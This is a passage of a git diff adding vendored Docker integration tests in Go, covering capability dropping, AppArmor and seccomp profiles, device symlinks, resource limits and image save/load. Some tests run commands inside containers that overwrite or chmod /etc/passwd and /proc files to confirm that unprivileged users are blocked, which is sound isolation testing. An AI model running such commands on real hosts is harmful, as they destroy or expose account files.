+		c.Fatalf("expected output to contain EUID=1000, got %s: %v", out, err)
+	}
+}
+
+func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChown(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	ensureSyscallTest(c)
+
+	// test that a root user has default capability CAP_CHOWN
+	runCmd := exec.Command(dockerBinary, "run", "busybox", "chown", "100", "/tmp")
+	_, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, check.IsNil)
+	// test that non root user does not have default capability CAP_CHOWN
+	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chown", "100", "/tmp")
+	out, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+	// test that root user can drop default capability CAP_CHOWN
+	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "chown", "busybox", "chown", "100", "/tmp")
+	out, _, err = runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+}
+
+func (s *DockerSuite) TestUserNoEffectiveCapabilitiesDacOverride(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	ensureSyscallTest(c)
+
+	// test that a root user has default capability CAP_DAC_OVERRIDE
+	runCmd := exec.Command(dockerBinary, "run", "busybox", "sh", "-c", "echo test > /etc/passwd")
+	_, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, check.IsNil)
+	// test that non root user does not have default capability CAP_DAC_OVERRIDE
+	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "sh", "-c", "echo test > /etc/passwd")
+	out, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Permission denied")
+	// TODO test that root user can drop default capability CAP_DAC_OVERRIDE
+}
+
+func (s *DockerSuite) TestUserNoEffectiveCapabilitiesFowner(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	ensureSyscallTest(c)
+
+	// test that a root user has default capability CAP_FOWNER
+	runCmd := exec.Command(dockerBinary, "run", "busybox", "chmod", "777", "/etc/passwd")
+	_, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, check.IsNil)
+	// test that non root user does not have default capability CAP_FOWNER
+	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chmod", "777", "/etc/passwd")
+	out, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+	// TODO test that root user can drop default capability CAP_FOWNER
+}
+
+// TODO CAP_KILL
+
+func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetuid(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	ensureSyscallTest(c)
+
+	// test that a root user has default capability CAP_SETUID
+	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setuid-test")
+	_, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, check.IsNil)
+	// test that non root user does not have default capability CAP_SETUID
+	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setuid-test")
+	out, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+	// test that root user can drop default capability CAP_SETUID
+	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setuid", "syscall-test", "setuid-test")
+	out, _, err = runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+}
+
+func (s *DockerSuite) TestUserNoEffectiveCapabilitiesSetgid(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	ensureSyscallTest(c)
+
+	// test that a root user has default capability CAP_SETGID
+	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "setgid-test")
+	_, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, check.IsNil)
+	// test that non root user does not have default capability CAP_SETGID
+	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "setgid-test")
+	out, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+	// test that root user can drop default capability CAP_SETGID
+	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "setgid", "syscall-test", "setgid-test")
+	out, _, err = runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+}
+
+// TODO CAP_SETPCAP
+
+func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetBindService(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	ensureSyscallTest(c)
+
+	// test that a root user has default capability CAP_NET_BIND_SERVICE
+	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "socket-test")
+	_, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, check.IsNil)
+	// test that non root user does not have default capability CAP_NET_BIND_SERVICE
+	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "socket-test")
+	out, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Permission denied")
+	// test that root user can drop default capability CAP_NET_BIND_SERVICE
+	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_bind_service", "syscall-test", "socket-test")
+	out, _, err = runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Permission denied")
+}
+
+func (s *DockerSuite) TestUserNoEffectiveCapabilitiesNetRaw(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	ensureSyscallTest(c)
+
+	// test that a root user has default capability CAP_NET_RAW
+	runCmd := exec.Command(dockerBinary, "run", "syscall-test", "raw-test")
+	_, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, check.IsNil)
+	// test that non root user does not have default capability CAP_NET_RAW
+	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "syscall-test", "raw-test")
+	out, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+	// test that root user can drop default capability CAP_NET_RAW
+	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "net_raw", "syscall-test", "raw-test")
+	out, _, err = runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+}
+
+func (s *DockerSuite) TestUserNoEffectiveCapabilitiesChroot(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	ensureSyscallTest(c)
+
+	// test that a root user has default capability CAP_SYS_CHROOT
+	runCmd := exec.Command(dockerBinary, "run", "busybox", "chroot", "/", "/bin/true")
+	_, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, check.IsNil)
+	// test that non root user does not have default capability CAP_SYS_CHROOT
+	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "chroot", "/", "/bin/true")
+	out, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+	// test that root user can drop default capability CAP_SYS_CHROOT
+	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "sys_chroot", "busybox", "chroot", "/", "/bin/true")
+	out, _, err = runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+}
+
+func (s *DockerSuite) TestUserNoEffectiveCapabilitiesMknod(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	ensureSyscallTest(c)
+
+	// test that a root user has default capability CAP_MKNOD
+	runCmd := exec.Command(dockerBinary, "run", "busybox", "mknod", "/tmp/node", "b", "1", "2")
+	_, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, check.IsNil)
+	// test that non root user does not have default capability CAP_MKNOD
+	runCmd = exec.Command(dockerBinary, "run", "--user", "1000:1000", "busybox", "mknod", "/tmp/node", "b", "1", "2")
+	out, _, err := runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+	// test that root user can drop default capability CAP_MKNOD
+	runCmd = exec.Command(dockerBinary, "run", "--cap-drop", "mknod", "busybox", "mknod", "/tmp/node", "b", "1", "2")
+	out, _, err = runCommandWithOutput(runCmd)
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Operation not permitted")
+}
+
+// TODO CAP_AUDIT_WRITE
+// TODO CAP_SETFCAP
+
+func (s *DockerSuite) TestRunApparmorProcDirectory(c *check.C) {
+	testRequires(c, SameHostDaemon, Apparmor)
+
+	// running w seccomp unconfined tests the apparmor profile
+	runCmd := exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/cgroup")
+	if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) {
+		c.Fatalf("expected chmod 777 /proc/1/cgroup to fail, got %s: %v", out, err)
+	}
+
+	runCmd = exec.Command(dockerBinary, "run", "--security-opt", "seccomp=unconfined", "busybox", "chmod", "777", "/proc/1/attr/current")
+	if out, _, err := runCommandWithOutput(runCmd); err == nil || !(strings.Contains(out, "Permission denied") || strings.Contains(out, "Operation not permitted")) {
+		c.Fatalf("expected chmod 777 /proc/1/attr/current to fail, got %s: %v", out, err)
+	}
+}
+
+// make sure the default profile can be successfully parsed (using unshare as it is
+// something which we know is blocked in the default profile)
+func (s *DockerSuite) TestRunSeccompWithDefaultProfile(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled)
+
+	out, _, err := dockerCmdWithError("run", "--security-opt", "seccomp=../profiles/seccomp/default.json", "debian:jessie", "unshare", "--map-root-user", "--user", "sh", "-c", "whoami")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "unshare: unshare failed: Operation not permitted")
+}
+
+// TestRunDeviceSymlink checks run with device that follows symlink (#13840 and #22271)
+func (s *DockerSuite) TestRunDeviceSymlink(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm, SameHostDaemon)
+	if _, err := os.Stat("/dev/zero"); err != nil {
+		c.Skip("Host does not have /dev/zero")
+	}
+
+	// Create a temporary directory to create symlink
+	tmpDir, err := ioutil.TempDir("", "docker_device_follow_symlink_tests")
+	c.Assert(err, checker.IsNil)
+
+	defer os.RemoveAll(tmpDir)
+
+	// Create a symbolic link to /dev/zero
+	symZero := filepath.Join(tmpDir, "zero")
+	err = os.Symlink("/dev/zero", symZero)
+	c.Assert(err, checker.IsNil)
+
+	// Create a temporary file "temp" inside tmpDir, write some data to "tmpDir/temp",
+	// then create a symlink "tmpDir/file" to the temporary file "tmpDir/temp".
+	tmpFile := filepath.Join(tmpDir, "temp")
+	err = ioutil.WriteFile(tmpFile, []byte("temp"), 0666)
+	c.Assert(err, checker.IsNil)
+	symFile := filepath.Join(tmpDir, "file")
+	err = os.Symlink(tmpFile, symFile)
+	c.Assert(err, checker.IsNil)
+
+	// Create a symbolic link to /dev/zero, this time with a relative path (#22271)
+	err = os.Symlink("zero", "/dev/symzero")
+	if err != nil {
+		c.Fatal("/dev/symzero creation failed")
+	}
+	// We need to remove this symbolic link here as it is created in /dev/, not temporary directory as above
+	defer os.Remove("/dev/symzero")
+
+	// md5sum of 'dd if=/dev/zero bs=4K count=8' is bb7df04e1b0a2570657527a7e108ae23
+	out, _ := dockerCmd(c, "run", "--device", symZero+":/dev/symzero", "busybox", "sh", "-c", "dd if=/dev/symzero bs=4K count=8 | md5sum")
+	c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "bb7df04e1b0a2570657527a7e108ae23", check.Commentf("expected output bb7df04e1b0a2570657527a7e108ae23"))
+
+	// symlink "tmpDir/file" to a file "tmpDir/temp" will result in an error as it is not a device.
+	out, _, err = dockerCmdWithError("run", "--device", symFile+":/dev/symzero", "busybox", "sh", "-c", "dd if=/dev/symzero bs=4K count=8 | md5sum")
+	c.Assert(err, check.NotNil)
+	c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "not a device node", check.Commentf("expected output 'not a device node'"))
+
+	// md5sum of 'dd if=/dev/zero bs=4K count=8' is bb7df04e1b0a2570657527a7e108ae23 (this time check with relative path backed, see #22271)
+	out, _ = dockerCmd(c, "run", "--device", "/dev/symzero:/dev/symzero", "busybox", "sh", "-c", "dd if=/dev/symzero bs=4K count=8 | md5sum")
+	c.Assert(strings.Trim(out, "\r\n"), checker.Contains, "bb7df04e1b0a2570657527a7e108ae23", check.Commentf("expected output bb7df04e1b0a2570657527a7e108ae23"))
+}
+
+// TestRunPIDsLimit makes sure the pids cgroup is set with --pids-limit
+func (s *DockerSuite) TestRunPIDsLimit(c *check.C) {
+	testRequires(c, pidsLimit)
+
+	file := "/sys/fs/cgroup/pids/pids.max"
+	out, _ := dockerCmd(c, "run", "--name", "skittles", "--pids-limit", "4", "busybox", "cat", file)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "4")
+
+	out = inspectField(c, "skittles", "HostConfig.PidsLimit")
+	c.Assert(out, checker.Equals, "4", check.Commentf("setting the pids limit failed"))
+}
+
+func (s *DockerSuite) TestRunPrivilegedAllowedDevices(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+
+	file := "/sys/fs/cgroup/devices/devices.list"
+	out, _ := dockerCmd(c, "run", "--privileged", "busybox", "cat", file)
+	c.Logf("out: %q", out)
+	c.Assert(strings.TrimSpace(out), checker.Equals, "a *:* rwm")
+}
+
+func (s *DockerSuite) TestRunUserDeviceAllowed(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	fi, err := os.Stat("/dev/snd/timer")
+	if err != nil {
+		c.Skip("Host does not have /dev/snd/timer")
+	}
+	stat, ok := fi.Sys().(*syscall.Stat_t)
+	if !ok {
+		c.Skip("Could not stat /dev/snd/timer")
+	}
+
+	file := "/sys/fs/cgroup/devices/devices.list"
+	out, _ := dockerCmd(c, "run", "--device", "/dev/snd/timer:w", "busybox", "cat", file)
+	c.Assert(out, checker.Contains, fmt.Sprintf("c %d:%d w", stat.Rdev/256, stat.Rdev%256))
+}
+
+func (s *DockerDaemonSuite) TestRunSeccompJSONNewFormat(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled)
+
+	err := s.d.StartWithBusybox()
+	c.Assert(err, check.IsNil)
+
+	jsonData := `{
+	"defaultAction": "SCMP_ACT_ALLOW",
+	"syscalls": [
+		{
+			"names": ["chmod", "fchmod", "fchmodat"],
+			"action": "SCMP_ACT_ERRNO"
+		}
+	]
+}`
+	tmpFile, err := ioutil.TempFile("", "profile.json")
+	c.Assert(err, check.IsNil)
+	defer tmpFile.Close()
+	_, err = tmpFile.Write([]byte(jsonData))
+	c.Assert(err, check.IsNil)
+
+	out, err := s.d.Cmd("run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "777", ".")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, "Operation not permitted")
+}
+
+func (s *DockerDaemonSuite) TestRunSeccompJSONNoNameAndNames(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled)
+
+	err := s.d.StartWithBusybox()
+	c.Assert(err, check.IsNil)
+
+	jsonData := `{
+	"defaultAction": "SCMP_ACT_ALLOW",
+	"syscalls": [
+		{
+			"name": "chmod",
+			"names": ["fchmod", "fchmodat"],
+			"action": "SCMP_ACT_ERRNO"
+		}
+	]
+}`
+	tmpFile, err := ioutil.TempFile("", "profile.json")
+	c.Assert(err, check.IsNil)
+	defer tmpFile.Close()
+	_, err = tmpFile.Write([]byte(jsonData))
+	c.Assert(err, check.IsNil)
+
+	out, err := s.d.Cmd("run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "777", ".")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, "'name' and 'names' were specified in the seccomp profile, use either 'name' or 'names'")
+}
+
+func (s *DockerDaemonSuite) TestRunSeccompJSONNoArchAndArchMap(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled)
+
+	err := s.d.StartWithBusybox()
+	c.Assert(err, check.IsNil)
+
+	jsonData := `{
+	"archMap": [
+		{
+			"architecture": "SCMP_ARCH_X86_64",
+			"subArchitectures": [
+				"SCMP_ARCH_X86",
+				"SCMP_ARCH_X32"
+			]
+		}
+	],
+	"architectures": [
+		"SCMP_ARCH_X32"
+	],
+	"defaultAction": "SCMP_ACT_ALLOW",
+	"syscalls": [
+		{
+			"names": ["chmod", "fchmod", "fchmodat"],
+			"action": "SCMP_ACT_ERRNO"
+		}
+	]
+}`
+	tmpFile, err := ioutil.TempFile("", "profile.json")
+	c.Assert(err, check.IsNil)
+	defer tmpFile.Close()
+	_, err = tmpFile.Write([]byte(jsonData))
+	c.Assert(err, check.IsNil)
+
+	out, err := s.d.Cmd("run", "--security-opt", "seccomp="+tmpFile.Name(), "busybox", "chmod", "777", ".")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, "'architectures' and 'archMap' were specified in the seccomp profile, use either 'architectures' or 'archMap'")
+}
+
+func (s *DockerDaemonSuite) TestRunWithDaemonDefaultSeccompProfile(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled)
+
+	err := s.d.StartWithBusybox()
+	c.Assert(err, check.IsNil)
+
+	// 1) verify I can run containers with the Docker default shipped profile which allows chmod
+	_, err = s.d.Cmd("run", "busybox", "chmod", "777", ".")
+	c.Assert(err, check.IsNil)
+
+	jsonData := `{
+	"defaultAction": "SCMP_ACT_ALLOW",
+	"syscalls": [
+		{
+			"name": "chmod",
+			"action": "SCMP_ACT_ERRNO"
+		}
+	]
+}`
+	tmpFile, err := ioutil.TempFile("", "profile.json")
+	c.Assert(err, check.IsNil)
+	defer tmpFile.Close()
+	_, err = tmpFile.Write([]byte(jsonData))
+	c.Assert(err, check.IsNil)
+
+	// 2) restart the daemon and add a custom seccomp profile in which we deny chmod
+	err = s.d.Restart("--seccomp-profile=" + tmpFile.Name())
+	c.Assert(err, check.IsNil)
+
+	out, err := s.d.Cmd("run", "busybox", "chmod", "777", ".")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, "Operation not permitted")
+}
+
+func (s *DockerSuite) TestRunWithNanoCPUs(c *check.C) {
+	testRequires(c, cpuCfsQuota, cpuCfsPeriod)
+
+	file1 := "/sys/fs/cgroup/cpu/cpu.cfs_quota_us"
+	file2 := "/sys/fs/cgroup/cpu/cpu.cfs_period_us"
+	out, _ := dockerCmd(c, "run", "--cpus", "0.5", "--name", "test", "busybox", "sh", "-c", fmt.Sprintf("cat %s && cat %s", file1, file2))
+	c.Assert(strings.TrimSpace(out), checker.Equals, "50000\n100000")
+
+	out = inspectField(c, "test", "HostConfig.NanoCpus")
+	c.Assert(out, checker.Equals, "5e+08", check.Commentf("setting the Nano CPUs failed"))
+	out = inspectField(c, "test", "HostConfig.CpuQuota")
+	c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0"))
+	out = inspectField(c, "test", "HostConfig.CpuPeriod")
+	c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0"))
+
+	out, _, err := dockerCmdWithError("run", "--cpus", "0.5", "--cpu-quota", "50000", "--cpu-period", "100000", "busybox", "sh")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, "Conflicting options: Nano CPUs and CPU Period cannot both be set")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go
new file mode 100644
index 0000000000..70139a59bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go
@@ -0,0 +1,383 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"reflect"
+	"regexp"
+	"sort"
+	"strings"
+	"time"
+
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// save a repo using gz compression and try to load it using stdout
+func (s *DockerSuite) TestSaveXzAndLoadRepoStdout(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "test-save-xz-and-load-repo-stdout"
+	dockerCmd(c, "run", "--name", name, "busybox", "true")
+
+	repoName := "foobar-save-load-test-xz-gz"
+	out, _ := dockerCmd(c, "commit", name, repoName)
+
+	dockerCmd(c, "inspect", repoName)
+
+	repoTarball, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "save", repoName),
+		exec.Command("xz", "-c"),
+		exec.Command("gzip", "-c"))
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save repo: %v %v", out, err))
+	deleteImages(repoName)
+
+	loadCmd := exec.Command(dockerBinary, "load")
+	loadCmd.Stdin = strings.NewReader(repoTarball)
+	out, _, err = runCommandWithOutput(loadCmd)
+	c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out))
+
+	after, _, err := dockerCmdWithError("inspect", repoName)
+	c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after))
+}
+
+// save a repo using xz+gz compression and try to load it using stdout
+func (s *DockerSuite) TestSaveXzGzAndLoadRepoStdout(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "test-save-xz-gz-and-load-repo-stdout"
+	dockerCmd(c, "run", "--name", name, "busybox", "true")
+
+	repoName := "foobar-save-load-test-xz-gz"
+	dockerCmd(c, "commit", name, repoName)
+
+	dockerCmd(c, "inspect", repoName)
+
+	out, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "save", repoName),
+		exec.Command("xz", "-c"),
+		exec.Command("gzip", "-c"))
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save repo: %v %v", out, err))
+
+	deleteImages(repoName)
+
+	loadCmd := exec.Command(dockerBinary, "load")
+	loadCmd.Stdin = strings.NewReader(out)
+	out, _, err = runCommandWithOutput(loadCmd)
+	c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out))
+
+	after, _, err := dockerCmdWithError("inspect", repoName)
+	c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after))
+}
+
+func (s *DockerSuite) TestSaveSingleTag(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	repoName := "foobar-save-single-tag-test"
+	dockerCmd(c, "tag", "busybox:latest", fmt.Sprintf("%v:latest", repoName))
+
+	out, _ := dockerCmd(c, "images", "-q", "--no-trunc", repoName)
+	cleanedImageID := strings.TrimSpace(out)
+
+	out, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "save", fmt.Sprintf("%v:latest", repoName)),
+		exec.Command("tar", "t"),
+		exec.Command("grep", "-E", fmt.Sprintf("(^repositories$|%v)", cleanedImageID)))
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save repo with image ID and 'repositories' file: %s, %v", out, err))
+}
+
+func (s *DockerSuite) TestSaveCheckTimes(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	repoName := "busybox:latest"
+	out, _ := dockerCmd(c, "inspect", repoName)
+	data := []struct {
+		ID      string
+		Created time.Time
+	}{}
+	err := json.Unmarshal([]byte(out), &data)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to marshal from %q: err %v", repoName, err))
+	c.Assert(len(data), checker.Not(checker.Equals), 0, check.Commentf("failed to marshal the data from %q", repoName))
+	tarTvTimeFormat := "2006-01-02 15:04"
+	out, _, err = runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "save", repoName),
+		exec.Command("tar", "tv"),
+		exec.Command("grep", "-E", fmt.Sprintf("%s %s", data[0].Created.Format(tarTvTimeFormat), digest.Digest(data[0].ID).Hex())))
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save repo with image ID and 'repositories' file: %s, %v", out, err))
+}
+
+func (s *DockerSuite) TestSaveImageId(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	repoName := "foobar-save-image-id-test"
+	dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v:latest", repoName))
+
+	out, _ := dockerCmd(c, "images", "-q", "--no-trunc", repoName)
+	cleanedLongImageID := strings.TrimPrefix(strings.TrimSpace(out), "sha256:")
+
+	out, _ = dockerCmd(c, "images", "-q", repoName)
+	cleanedShortImageID := strings.TrimSpace(out)
+
+	// Make sure IDs are not empty
+	c.Assert(cleanedLongImageID, checker.Not(check.Equals), "", check.Commentf("Id should not be empty."))
+	c.Assert(cleanedShortImageID, checker.Not(check.Equals), "", check.Commentf("Id should not be empty."))
+
+	saveCmd := exec.Command(dockerBinary, "save", cleanedShortImageID)
+	tarCmd := exec.Command("tar", "t")
+
+	var err error
+	tarCmd.Stdin, err = saveCmd.StdoutPipe()
+	c.Assert(err, checker.IsNil, check.Commentf("cannot set stdout pipe for tar: %v", err))
+	grepCmd := exec.Command("grep", cleanedLongImageID)
+	grepCmd.Stdin, err = tarCmd.StdoutPipe()
+	c.Assert(err, checker.IsNil, check.Commentf("cannot set stdout pipe for grep: %v", err))
+
+	c.Assert(tarCmd.Start(), checker.IsNil, check.Commentf("tar failed with error: %v", err))
+	c.Assert(saveCmd.Start(), checker.IsNil, check.Commentf("docker save failed with error: %v", err))
+	defer func() {
+		saveCmd.Wait()
+		tarCmd.Wait()
+		dockerCmd(c, "rmi", repoName)
+	}()
+
+	out, _, err = runCommandWithOutput(grepCmd)
+
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save repo with image ID: %s, %v", out, err))
+}
+
+// save a repo and try to load it using flags
+func (s *DockerSuite) TestSaveAndLoadRepoFlags(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "test-save-and-load-repo-flags"
+	dockerCmd(c, "run", "--name", name, "busybox", "true")
+
+	repoName := "foobar-save-load-test"
+
+	deleteImages(repoName)
+	dockerCmd(c, "commit", name, repoName)
+
+	before, _ := dockerCmd(c, "inspect", repoName)
+
+	out, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "save", repoName),
+		exec.Command(dockerBinary, "load"))
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err))
+
+	after, _ := dockerCmd(c, "inspect", repoName)
+	c.Assert(before, checker.Equals, after, check.Commentf("inspect is not the same after a save / load"))
+}
+
+func (s *DockerSuite) TestSaveWithNoExistImage(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	imgName := "foobar-non-existing-image"
+
+	out, _, err := dockerCmdWithError("save", "-o", "test-img.tar", imgName)
+	c.Assert(err, checker.NotNil, check.Commentf("save image should fail for non-existing image"))
+	c.Assert(out, checker.Contains, fmt.Sprintf("No such image: %s", imgName))
+}
+
+func (s *DockerSuite) TestSaveMultipleNames(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	repoName := "foobar-save-multi-name-test"
+
+	// Make one image
+	dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v-one:latest", repoName))
+
+	// Make two images
+	dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v-two:latest", repoName))
+
+	out, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "save", fmt.Sprintf("%v-one", repoName), fmt.Sprintf("%v-two:latest", repoName)),
+		exec.Command("tar", "xO", "repositories"),
+		exec.Command("grep", "-q", "-E", "(-one|-two)"),
+	)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save multiple repos: %s, %v", out, err))
+}
+
+func (s *DockerSuite) TestSaveRepoWithMultipleImages(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	makeImage := func(from string, tag string) string {
+		var (
+			out string
+		)
+		out, _ = dockerCmd(c, "run", "-d", from, "true")
+		cleanedContainerID := strings.TrimSpace(out)
+
+		out, _ = dockerCmd(c, "commit", cleanedContainerID, tag)
+		imageID := strings.TrimSpace(out)
+		return imageID
+	}
+
+	repoName := "foobar-save-multi-images-test"
+	tagFoo := repoName + ":foo"
+	tagBar := repoName + ":bar"
+
+	idFoo := makeImage("busybox:latest", tagFoo)
+	idBar := makeImage("busybox:latest", tagBar)
+
+	deleteImages(repoName)
+
+	// create the archive
+	out, _, err := runCommandPipelineWithOutput(
+		exec.Command(dockerBinary, "save", repoName, "busybox:latest"),
+		exec.Command("tar", "t"))
+	c.Assert(err, checker.IsNil, check.Commentf("failed to save multiple images: %s, %v", out, err))
+
+	lines := strings.Split(strings.TrimSpace(out), "\n")
+	var actual []string
+	for _, l := range lines {
+		if regexp.MustCompile("^[a-f0-9]{64}\\.json$").Match([]byte(l)) {
+			actual = append(actual, strings.TrimSuffix(l, ".json"))
+		}
+	}
+
+	// make the list of expected layers
+	out = inspectField(c, "busybox:latest", "Id")
+	expected := []string{strings.TrimSpace(out), idFoo, idBar}
+
+	// prefixes are not in tar
+	for i := range expected {
+		expected[i] = digest.Digest(expected[i]).Hex()
+	}
+
+	sort.Strings(actual)
+	sort.Strings(expected)
+	c.Assert(actual, checker.DeepEquals, expected, check.Commentf("archive does not contains the right layers: got %v, expected %v, output: %q", actual, expected, out))
+}
+
+// Issue #6722 #5892 ensure directories are included in changes
+func (s *DockerSuite) TestSaveDirectoryPermissions(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	layerEntries := []string{"opt/", "opt/a/", "opt/a/b/", "opt/a/b/c"}
